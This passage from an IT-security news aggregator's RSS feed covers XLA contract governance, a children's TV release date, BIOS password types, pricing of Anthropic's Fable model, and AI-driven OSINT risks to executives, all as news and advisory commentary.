<p class="wp-block-paragraph">I’ve seen this repeatedly in Infosys, HCL, and TCS relationships. The strongest XLA structures combine risk and reward where providers earn meaningful upside for exceeding targets, innovating, and improving outcomes. Penalties still matter, especially in mature programs, but they can’t be the only lever otherwise the contract becomes another SLA model with better branding.</p>



<h2 class="wp-block-heading">Define escalation processes</h2>



<p class="wp-block-paragraph">When experience scores fall below threshold, the contract needs to specify what happens next. This sounds obvious, but I’ve reviewed many service delivery measurement frameworks in clients’ incumbent MPS contracts that specify financial consequences without defining any collaborative process to address the underlying problem.</p>



<p class="wp-block-paragraph">The escalation language I push clients to include specifies:</p>



<ul class="wp-block-list">
<li>a joint review process triggered when scores fall below threshold.</li>



<li>root cause analysis expectations and timelines.</li>



<li>remediation planning requirements with named owners on both sides.</li>



<li>timelines for corrective action and progress reporting.</li>
</ul>



<p class="wp-block-paragraph">The framing matters as much as the mechanics. Escalation should be positioned as collaborative problem-solving, not blame assignment. Contracts that turn every missed score into a commercial dispute damage the relationship when provider engagement matters most. The best MSPs treat escalation as a shared diagnostic exercise, not a contractual confrontation.</p>



<h2 class="wp-block-heading">Establish an operating rhythm</h2>



<p class="wp-block-paragraph">Signing the contract is the beginning, not the end. In my experience, the organizations that get the most out of XLA programs are those that build a disciplined operating cadence and stick to it. The ones that treat XLAs as a reporting exercise almost never see meaningful improvement.</p>



<p class="wp-block-paragraph">This is the cadence I recommend:</p>



<p class="wp-block-paragraph"><strong>Daily</strong>: Both parties maintain live dashboards showing experience trends, application performance, regional issues, and persona-specific insights to catch emerging issues.</p>



<p class="wp-block-paragraph"><strong>Weekly</strong>: Customer and vendor teams hold focused working sessions to determine what improved experience this week, what hurt it, which remediation actions were completed, and what’s the priority for next week.</p>



<p class="wp-block-paragraph"><strong>Monthly</strong>: Formal governance meetings to review experience scores, improvement actions, root cause discussions, and cross-functional issues that need escalation.</p>



<p class="wp-block-paragraph"><strong>Biannually</strong>: Leadership steering meetings to assess overall experience performance, recalibrate targets, and align the XLA program with evolving business priorities to honestly evaluate whether or not the program is driving the outcomes the organization actually cares about.</p>



<h2 class="wp-block-heading">Common mistakes organizations make</h2>



<p class="wp-block-paragraph">After working through XLA design and implementation with clients across their MSP relationships, the failure modes are predictable. Here’s what to watch for.</p>



<p class="wp-block-paragraph"><strong>Setting targets before establishing a baseline<br></strong>Rushing into targets before understanding your current state is one of the fastest ways to create disputes. Spend the first three to six months gathering baseline data, then negotiate targets based on evidence rather than guesswork.</p>



<p class="wp-block-paragraph"><strong>Measuring too much<br></strong>More metrics don’t create more insight. Frameworks with 20 data points rarely survive operational reality. Start focused and expand gradually.</p>



<p class="wp-block-paragraph"><strong>Hiding the data<br></strong>Transparency is foundational to XLAs. Providers who obscure poor scores, especially when controlling the measurement platform, undermine the entire model. Clients who weaponize the data create the same problem. Build mutual transparency obligations into the contract.</p>



<p class="wp-block-paragraph"><strong>Over-relying on penalties<br></strong>Penalty-only structures recreate legacy SLA behaviors. Balanced incentives drive better long-term outcomes.</p>



<p class="wp-block-paragraph"><strong>Treating XLAs as static<br></strong>Employee expectations, technology, and business priorities evolve constantly. Without formal review cycles, XLA programs quickly become irrelevant<strong>.</strong></p>



<h2 class="wp-block-heading">Start smaller than you think you need to</h2>



<p class="wp-block-paragraph">The organizations that get XLAs right are rarely the ones with the most sophisticated tooling. They’re the ones that stopped waiting for a perfect program and introduced real accountability into the contract with what they had.</p>



<p class="wp-block-paragraph">The most effective starting points are often simple: agree on a focused set of experience metrics, establish a six-month review cycle, commit to shared visibility and data transparency, and create joint accountability for continuous improvement.</p>



<p class="wp-block-paragraph">From there, maturity develops over time. Governance builds trust, data becomes more actionable, and targets evolve alongside business priorities. The relationship shifts from compliance management to outcome-driven partnership.</p>



<p class="wp-block-paragraph">In my experience, the organizations that succeed are the ones that stopped accepting green scorecards at face value and demanded something more meaningful.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Confirms Stillwater Season 5 Release Date, All Episodes Arrive This August]]></title>
<description><![CDATA[Apple TV has confirmed the release date for Stillwater season 5, giving families another collection of gentle stories focused on emotions, friendship, and everyday challenges. The animated series will return globally on Friday, August 21, 2026, with all five new episodes arriving together.



The...]]></description>
<link>https://tsecurity.de/de/3675081/ios-mac-os/apple-tv-confirms-stillwater-season-5-release-date-all-episodes-arrive-this-august/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675081/ios-mac-os/apple-tv-confirms-stillwater-season-5-release-date-all-episodes-arrive-this-august/</guid>
<pubDate>Fri, 17 Jul 2026 07:09:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has confirmed the release date for Stillwater season 5, giving families another collection of gentle stories focused on emotions, friendship, and everyday challenges. The animated series will return globally on Friday, August 21, 2026, with all five new episodes arriving together.



The new season continues the award-winning story of siblings Karl, Addy, and Michael, whose wise panda neighbor helps them understand their feelings and look at difficult situations from a calmer perspective. Viewers can currently stream the first four seasons on Apple TV.



Here are the main details about the upcoming season:




Release date: Friday, August 21, 2026



Number of episodes: Five



Release schedule: All episodes will arrive together



Genre: Animated kids and family series



Start airing date: August 21, 2026



Finish date: August 21, 2026



Where to watch: Apple TV



Main voice cast: James Sie, Eva Ariel Binder, Tucker Chandler, and Judah Mackey




What is Stillwater season 5 about?







Stillwater follows Karl, Addy, and Michael as they deal with problems that feel familiar to young viewers, including disappointment, uncertainty, disagreements, and fear of trying something new.



Their neighbor Stillwater listens to their concerns and often shares a thoughtful story that helps them see the situation differently. His advice encourages the children to slow down, understand their emotions, and find their own way forward.



Season 5 will continue this familiar format through five new adventures. Each episode will focus on the children learning more about themselves, their relationships, and the world around them. The series remains inspired by Jon J Muth’s bestselling Zen book collection.



The first look at the season shows Stillwater returning alongside the three siblings, suggesting that the new episodes will maintain the peaceful visual style and warm storytelling that have defined the show since its 2020 debut.



There are currently no major plot details or episode descriptions available, so viewers will need to wait for a trailer or further announcements to learn which specific challenges Karl, Addy, and Michael will face.




https://www.youtube.com/watch?v=zz1GkcvkT1g




FAQs



When is the Stillwater season 5 release date?



Stillwater season 5 will premiere globally on Apple TV on Friday, August 21, 2026.



How many episodes are in Stillwater season 5?



The fifth season contains five new episodes. Apple TV will release all five episodes on the premiere date, allowing families to watch the full season immediately.



Will Stillwater season 5 release weekly?



No. All five episodes will become available together on August 21, 2026.



Who voices Stillwater in the animated series?



James Sie voices Stillwater. The main cast also includes Eva Ariel Binder as Addy, Tucker Chandler as Michael, and Judah Mackey as Karl.



Is Stillwater suitable for children?



Yes. Stillwater is an animated kids and family series that focuses on emotional awareness, mindfulness, kindness, and solving everyday problems.



Where can I watch the previous seasons?



All four previous seasons are available to stream on Apple TV before season 5 arrives.



Is Stillwater season 5 the final season?



Apple TV has announced the fifth season but has not officially described it as the final season. Its future beyond these five episodes remains unconfirmed.



Apple TV costs $12.99 per month in the United States after a seven-day free trial. With every new episode arriving on the same day, families can watch Stillwater season 5 at their own pace from August 21. Do you plan to watch the new season? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[The BIOS Password Mistake]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:96 Not every "BIOS password" is actually the same thing.

In this conversation, the distinction is made between a BIOS setup password, a boot password, a hard drive password, and a BitLocker recovery key. Each protects a different l...]]></description>
<link>https://tsecurity.de/de/3674736/it-security-video/the-bios-password-mistake/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674736/it-security-video/the-bios-password-mistake/</guid>
<pubDate>Fri, 17 Jul 2026 00:18:08 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:96 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/3P62uY6obOs?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Not every "BIOS password" is actually the same thing.<br />
<br />
In this conversation, the distinction is made between a BIOS setup password, a boot password, a hard drive password, and a BitLocker recovery key. Each protects a different layer of the system.<br />
<br />
Confusing these terms can lead to incorrect troubleshooting, mistaken security assumptions, or unnecessary recovery efforts. Knowing what each password actually protects makes it much easier to understand why a system is locked—or what kind of credential is really being requested.<br />
<br />
The conversation also highlights a common misconception: BitLocker recovery is separate from firmware authentication.<br />
<br />
Which password type do you think creates the most confusion for IT professionals and everyday users?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#BIOS #TechExplained #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Daily Summary 2026-07-16]]></title>
<description><![CDATA[170 posts were published in the last hour 21:35 : How mapping security controls can ease the compliance burden 21:34 : Coca-Cola suspended production at its Fairlife dairy after a ransomware attack 20:34 : Wordfence Intelligence Weekly WordPress Vulnerability Report…
Read more →
The post IT Secur...]]></description>
<link>https://tsecurity.de/de/3674723/it-security-nachrichten/it-security-news-daily-summary-2026-07-16/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674723/it-security-nachrichten/it-security-news-daily-summary-2026-07-16/</guid>
<pubDate>Fri, 17 Jul 2026 00:06:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>170 posts were published in the last hour 21:35 : How mapping security controls can ease the compliance burden 21:34 : Coca-Cola suspended production at its Fairlife dairy after a ransomware attack 20:34 : Wordfence Intelligence Weekly WordPress Vulnerability Report…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-07-16/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-07-16/">IT Security News Daily Summary 2026-07-16</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[1999 Called and It Wants It's Exploits Back - PSW #935]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:10 This week, our technical segment covers a new open-source tool written by Paul (and Claude) that helps you keep your Linux systems up to date and assess supply chain risks. It's called "fettle" and is a pure Python implementation...]]></description>
<link>https://tsecurity.de/de/3674666/it-security-video/1999-called-and-it-wants-its-exploits-back-psw-935/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674666/it-security-video/1999-called-and-it-wants-its-exploits-back-psw-935/</guid>
<pubDate>Thu, 16 Jul 2026 23:18:28 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:10 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/k3qcjG4NEvM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This week, our technical segment covers a new open-source tool written by Paul (and Claude) that helps you keep your Linux systems up to date and assess supply chain risks. It's called "fettle" and is a pure Python implementation that gives you even more features than previously discussed! Then in the security news:<br />
<br />
- The GodDamn Ransomware <br />
- CMMC suspended<br />
- Holy Microsoft Tuesday!<br />
- Lessons learned<br />
- Without the Internet, do we still get water?<br />
- The forgotten shims<br />
- More than two BIOS passwords<br />
- Cracking firmware encryption with Claude<br />
- 1999 called, and it wants its "Exploits" back<br />
- Prompt injection for defenders<br />
- Grok has your repo<br />
- You're not going to outpatch AI<br />
<br />
<br />
Visit https://www.securityweekly.com/psw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/psw-935<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wordfence Intelligence Weekly WordPress Vulnerability Report (July 6, 2026 to July 12, 2026)]]></title>
<description><![CDATA[Last week, there were disclosed in and that have been added to the Wordfence Intelligence Vulnerability Database, and there were that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not…
Read more →
The post Wordfence Intelligenc...]]></description>
<link>https://tsecurity.de/de/3674607/it-security-nachrichten/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-6-2026-to-july-12-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674607/it-security-nachrichten/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-6-2026-to-july-12-2026/</guid>
<pubDate>Thu, 16 Jul 2026 22:38:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Last week, there were disclosed in and that have been added to the Wordfence Intelligence Vulnerability Database, and there were that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-6-2026-to-july-12-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-6-2026-to-july-12-2026/">Wordfence Intelligence Weekly WordPress Vulnerability Report (July 6, 2026 to July 12, 2026)</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Governance Is Everyone's Problem]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:3 AI adoption impacts nearly every part of an organization. Security teams must evaluate risks around data, access, and technology, but they cannot manage AI governance alone.

A successful AI governance program requires shared owne...]]></description>
<link>https://tsecurity.de/de/3673764/it-security-video/ai-governance-is-everyones-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673764/it-security-video/ai-governance-is-everyones-problem/</guid>
<pubDate>Thu, 16 Jul 2026 16:18:41 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/4Pgj1dpY0Q4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI adoption impacts nearly every part of an organization. Security teams must evaluate risks around data, access, and technology, but they cannot manage AI governance alone.<br />
<br />
A successful AI governance program requires shared ownership across security, IT, legal, privacy, finance, and business teams. Without coordination, organizations may face unexpected risks, uncontrolled spending, and unclear accountability as AI usage expands.<br />
<br />
Should AI governance have a dedicated owner, or should responsibility remain distributed across the entire organization?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AIGovernance #EnterpriseAI #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Denial of Service in perl-Imager (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3673727/it-security-nachrichten/denial-of-service-in-perl-imager-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673727/it-security-nachrichten/denial-of-service-in-perl-imager-fedora/</guid>
<pubDate>Thu, 16 Jul 2026 16:08:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Denial of Service in perl-Imager (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3673723/it-security-nachrichten/denial-of-service-in-perl-imager-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673723/it-security-nachrichten/denial-of-service-in-perl-imager-fedora/</guid>
<pubDate>Thu, 16 Jul 2026 16:08:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[FOSS Weekly #26.29: Mint Goes Wayland, OpenBook Reader, Terminal Shortcut Tips, Linux Handheld Computers and More]]></title>
<description><![CDATA[Is wayland slow?]]></description>
<link>https://tsecurity.de/de/3673668/unix-server/foss-weekly-2629-mint-goes-wayland-openbook-reader-terminal-shortcut-tips-linux-handheld-computers-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673668/unix-server/foss-weekly-2629-mint-goes-wayland-openbook-reader-terminal-shortcut-tips-linux-handheld-computers-and-more/</guid>
<pubDate>Thu, 16 Jul 2026 15:46:13 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Is wayland slow?]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (cups, git-lfs, kernel, libsolv, libxml2, python3.12, and python3.9), Debian (chromium, dhcpcd5, and ntfs-3g), Fedora (firefox, perl-Imager, python-bcrypt, python-tiktoken, roundcubemail, and xrdp), Mageia (openssl, poppler, python-mistune, and tmux)...]]></description>
<link>https://tsecurity.de/de/3673572/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673572/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 16 Jul 2026 15:11:35 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (cups, git-lfs, kernel, libsolv, libxml2, python3.12, and python3.9), <b>Debian</b> (chromium, dhcpcd5, and ntfs-3g), <b>Fedora</b> (firefox, perl-Imager, python-bcrypt, python-tiktoken, roundcubemail, and xrdp), <b>Mageia</b> (openssl, poppler, python-mistune, and tmux), <b>Oracle</b> (389-ds-base, cups, git-lfs, glibc, host-metering, kernel, libsolv, libxml2, nginx:1.24, PackageKit, python-pillow, and qemu-kvm), <b>Red Hat</b> (buildah, containernetworking-plugins, and skopeo), <b>SUSE</b> (buildah, cosign, curl, distribution, dnsmasq, glib-networking, glibc, gnutls, gstreamer-plugins-bad, ImageMagick, kernel, podman, python-cryptography, python313-django-debug-toolbar, rekor, sccache, sssd, and yelp), and <b>Ubuntu</b> (dotnet8, dotnet10, libslirp, luajit, python-idna, sympa, and tomcat8).]]></content:encoded>
</item>
<item>
<title><![CDATA[Vertrauen ins Backup: Sind Sie auf ein Recovery vorbereitet? | Computer Weekly]]></title>
<description><![CDATA[In kleineren Unternehmen ist Sicherheit oft Teil der allgemeinen IT-Verantwortung. Der Mangel an klaren Zuständigkeiten und Fachwissen hängt ...]]></description>
<link>https://tsecurity.de/de/3673117/it-security-nachrichten/vertrauen-ins-backup-sind-sie-auf-ein-recovery-vorbereitet-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673117/it-security-nachrichten/vertrauen-ins-backup-sind-sie-auf-ein-recovery-vorbereitet-computer-weekly/</guid>
<pubDate>Thu, 16 Jul 2026 12:36:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In kleineren Unternehmen ist <b>Sicherheit</b> oft Teil der allgemeinen <b>IT</b>-Verantwortung. Der Mangel an klaren Zuständigkeiten und Fachwissen hängt ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic’s ‘free’ Fable offer — a token lock-in trap for users?]]></title>
<description><![CDATA[It’s not so much generosity that’s behind Anthropic’s decision to extend free access to its most advanced model, Fable, for paid subscribers until July 19, analysts say. Its a last-minute move to grab users, data and model evaluation results.



After the free-access period, Anthropic plans to co...]]></description>
<link>https://tsecurity.de/de/3673105/ai-nachrichten/anthropics-free-fable-offer-a-token-lock-in-trap-for-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673105/ai-nachrichten/anthropics-free-fable-offer-a-token-lock-in-trap-for-users/</guid>
<pubDate>Thu, 16 Jul 2026 12:32:48 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s not so much generosity that’s behind Anthropic’s decision to extend free access to its most advanced model, Fable, for paid subscribers until July 19, analysts say. Its a last-minute move to grab users, data and model evaluation results.</p>



<p class="wp-block-paragraph">After the free-access period, Anthropic plans to convert Fable to a pay-per-use model, at $10 per million input tokens and a whopping $50 for 1 million output tokens.</p>



<p class="wp-block-paragraph">That is double the price of its next most advanced model, Opus 4.8, for input and output tokens. “We’re extending Claude Fable 5 access on all paid plans, as well as keeping Claude Code’s weekly rate limits 50% higher, through July 19,” <a href="https://x.com/claudeai/status/2076351399999557669" target="_blank" rel="noreferrer noopener">Anthropic’s team said in a July 12 tweet</a>.</p>



<p class="wp-block-paragraph">Anthropic keeps extending Fable because it does not yet know what its flagship is worth, said Sanchit Vir Gogia, principal analyst at Greyhound Research. “A vendor confident in its price does not move the same cutoff twice in six days, both times at the wire,” Gogia said.</p>



<p class="wp-block-paragraph">Anthropic is essentially pushing deadlines to test its products, while users gain by being able to put their toughest tasks to Fable, Gogia said.</p>



<p class="wp-block-paragraph">Anthropic, which did not immediately reply to a request for comment about the situation, has already seen plenty of action with Fable and its sister model Mythos. Both have been touted as the company’s most advanced models yet.</p>



<h2 class="wp-block-heading">Fable stumbles, then reappears</h2>



<p class="wp-block-paragraph">Fable was officially launched June 9. Just three days later, on June 12, the <a href="https://www.computerworld.com/article/4185515/anthropics-new-privacy-policy-offers-us-consumers-a-way-around-fable-ban-2.html">US government put export controls on it</a> after Amazon researchers bypassed Fable’s safeguards, prompting the model to identify software vulnerabilities and demonstrate an exploit. </p>



<p class="wp-block-paragraph">After Anthropic scrambled to address the issues — and <a href="https://www.computerworld.com/article/4191565/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models-2.html">after the export controls were lifted</a> — Fable was relaunched July 1.</p>



<p class="wp-block-paragraph">Fable’s freebie extension comes after OpenAI’s latest model, ChatGPT 5.6 Sol, became generally available July 9. Sol is cheaper at $5 per one million tokens input, and $30 for 1 million output tokens.</p>



<p class="wp-block-paragraph">Anthropic and OpenAI are competing aggressively to build market share, said Jack Gold, principal analyst at J. Gold Associates. “Anthropic and OpenAI are looking to go public and the more users they have, the more attractive it is — even if they are not yet producing income,” he said.</p>



<p class="wp-block-paragraph">In some ways, the two companies are following a well-trodden path to get customers hooked on their products and turned into paying customers. That’s what Meta, Google and Microsoft, for instance, have done over the years with various “free” offers that later morphed into paid products. </p>



<p class="wp-block-paragraph">Plus, said Gold, ”The more users you have, the better you can train your models across multiple data sets.”</p>



<p class="wp-block-paragraph">That’s a potential boon for proprietary large language model (LLM) vendors offering free tokens in a bid to lock enterprises and vendors into their AI environments. But numerous experts have warned enterprises not to fall for that tactic. Instead, they argue enterprises <a href="https://www.computerworld.com/article/4188012/too-good-to-be-true-avoid-free-ai-token-offers-or-risk-vendor-lock-in.html">should diversify AI development across multiple AI and cloud vendors</a>, and adopt open-source models.</p>



<h2 class="wp-block-heading">An LLM space race?</h2>



<p class="wp-block-paragraph">According to <a href="https://artificialanalysis.ai/leaderboards/models" target="_blank" rel="noreferrer noopener">LLM benchmarks maintained by Artificial Analysis</a>, Fable is the most intelligent model currently available, with Sol just behind it in second place. <a href="https://livebench.ai/#/" target="_blank" rel="noreferrer noopener">One benchmark by LiveBench</a> places Sol as being better in reasoning, with Fable better at math, data analysis, instruction following and language. Both models have advantages in coding.</p>



<p class="wp-block-paragraph">Meanwhile, Cursor and SpaceXAI on July 8 <a href="https://www.computerworld.com/article/4194914/spacexai-launches-grok-4-5-touts-lower-coding-task-costs-than-ai-rivals-2.html">unveiled Grok 4.5</a>, which the companies said can “handle difficult, long-running tasks that require creatively using tools to solve problems, whether in software engineering, data science, finance, legal work, or anything else you do on a computer,” <a href="https://cursor.com/blog/grok-4-5" target="_blank" rel="noreferrer noopener">the company said in a blog entry</a>.</p>



<p class="wp-block-paragraph">Its pricing is even more aggressive than Fable and ChatGPT 5.6 Sol. Grok 4.5 charges $2 for 1 million input tokens and $6 for 1 million output tokens.</p>



<p class="wp-block-paragraph">There are <a href="https://www.computerworld.com/article/4185848/how-companies-are-racing-to-solve-the-ai-token-problem.html">growing concerns about tokenmaxxing</a>, where enterprises rack up billions of dollars in token spending, blowing past usage limits before finance controls are implemented.</p>



<p class="wp-block-paragraph">Enterprises might decide to spend more on models such as Mythos and Fable — if the benefits are tangible, said Max Leaming, head of data science and AI solutions at ManpowerGroup. Fable and Mythos may “actually be less expensive to use in spite of the spiked token cost because it’s far more efficient,” he said.</p>



<p class="wp-block-paragraph">A company might find that the models use fewer tokens, are faster, and can reduce compute time, he said. “Even though the per-token costs may go up, we may see overall costs go down,” Leaming said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The executive profile your security team isn’t defending]]></title>
<description><![CDATA[A few years ago, I was retained to conduct a digital risk review for the chief executive of a mid-sized financial services firm. The brief was standard. Assess what was publicly available about the executive, identify exposure and advise on remediation. The AI tools I used completed the substanti...]]></description>
<link>https://tsecurity.de/de/3672879/it-security-nachrichten/the-executive-profile-your-security-team-isnt-defending/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672879/it-security-nachrichten/the-executive-profile-your-security-team-isnt-defending/</guid>
<pubDate>Thu, 16 Jul 2026 11:09:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A few years ago, I was retained to conduct a digital risk review for the chief executive of a mid-sized financial services firm. The brief was standard. Assess what was publicly available about the executive, identify exposure and advise on remediation. The AI tools I used completed the substantive reconnaissance in under ten minutes.</p>



<p class="wp-block-paragraph">What came back was a synthesized profile. Board memberships and the dates they started. A pattern of public commentary that revealed which policy positions the executive held strongly and which ones he would likely bend on under pressure. A philanthropic interest that explained which causes he would respond to if someone framed an ask around them. None of this information was sensitive in isolation. But assembled into a single, queryable narrative, it was something an attacker could use immediately.</p>



<p class="wp-block-paragraph">What I was looking at was a publicly accessible query to a general-purpose AI tool. And that is the problem most executive protection programs have not yet confronted. The reconnaissance phase for a targeted social engineering attack now takes minutes, not days, and the inputs required are trivial.</p>



<p class="wp-block-paragraph">AI-aggregated executive data has become an attack surface. Most security programs have not yet adapted to it.</p>



<h2 class="wp-block-heading"><a></a>The reconnaissance phase has effectively collapsed</h2>



<p class="wp-block-paragraph">Traditional <a href="https://www.csoonline.com/article/567859/what-is-osint-top-open-source-intelligence-tools.html">OSINT</a> work against an executive target required skill and patience. A competent analyst could build a useful profile over several days by working through search engines, corporate filings, social platforms and archived media. That work was a meaningful barrier. It took time and it required judgment about which sources to trust. It also left trails if the attacker was careless.</p>



<p class="wp-block-paragraph">AI aggregation removes all three constraints.</p>



<p class="wp-block-paragraph">The speed advantage is obvious but it is not the most important change. The more significant shift is synthesis. A search engine returns documents. An AI tool returns a coherent narrative with inferred relationships and interpreted significance. When I query a major AI platform for a senior executive by name, I get a structured account of their career arc, their professional relationships, their areas of visible influence and frequently their personal interests, relationships and public-facing affiliations.</p>



<p class="wp-block-paragraph">The <a href="https://westoahu.hawaii.edu/cyber/global-weekly-exec-summary/alphv-hackers-reveal-details-of-mgm-cyber-attack/">MGM Resorts incident </a>reported in 2023 illustrated the principle at scale. Attackers reportedly identified an MGM executive on LinkedIn, used that public profile information to impersonate them in a call to the IT help desk and obtained access credentials within minutes. The OSINT required was minimal and the manipulation was straightforward. What AI tools have done since is make that kind of reconnaissance faster, more complete and available to actors who lack the manual tradecraft to run it themselves.</p>



<p class="wp-block-paragraph">As the<a href="https://www.verizon.com/business/resources/reports/dbir/"> Verizon Data Breach Investigations Report </a>consistently documents, the human element is present in the majority of confirmed breaches, and social engineering remains one of the most reliable initial access vectors.</p>



<p class="wp-block-paragraph">The accessible nature of AI tools is also expanding the threat population. Attacks that previously required a skilled analyst to design now require only a motivated actor with internet access. That changes the volume and targeting calculus. Executives who were previously too obscure to justify a sophisticated manual attack are now viable targets for anyone with a grievance and a query box.</p>



<h2 class="wp-block-heading"><a></a>What should CIOs and CISOs do about it?</h2>



<p class="wp-block-paragraph">The instinct in many organizations is to route anything involving an executive’s public profile to the comms or PR function. That instinct made sense when the risk was reputational. It no longer covers the exposure.</p>



<p class="wp-block-paragraph">What follows is how I advise clients to structure this work.</p>



<h3 class="wp-block-heading">Monitor regularly</h3>



<p class="wp-block-paragraph">The starting point is establishing visibility into what AI tools are actually returning about your executive population. Not a one-time audit conducted during a board meeting and forgotten. The profiles shift continuously as new content is indexed, old content is reweighted and the models are updated.</p>



<p class="wp-block-paragraph">Assign ownership to run structured queries across the major platforms, including ChatGPT, Gemini, Perplexity and the Microsoft Copilot stack, on a regular cadence. Document what you find and track changes. Treat the output the same way you would treat a vulnerability scan as something to be prioritized and acted upon.</p>



<h3 class="wp-block-heading">Reduce the available attack surface</h3>



<p class="wp-block-paragraph">Work with each executive to identify content that expands their AI-indexed profile without serving any legitimate business purpose. This includes legacy conference bios that contain personal details, social posts that reveal schedule patterns or family context and board announcements that, in aggregate, map an executive’s full professional network. For some of this content, removal is possible and worth pursuing with a targeted effort.</p>



<p class="wp-block-paragraph">The more important conversation is around future behavior. Executives who habitually overshare on LinkedIn or in conference panels need to understand, concretely, what that sharing enables.</p>



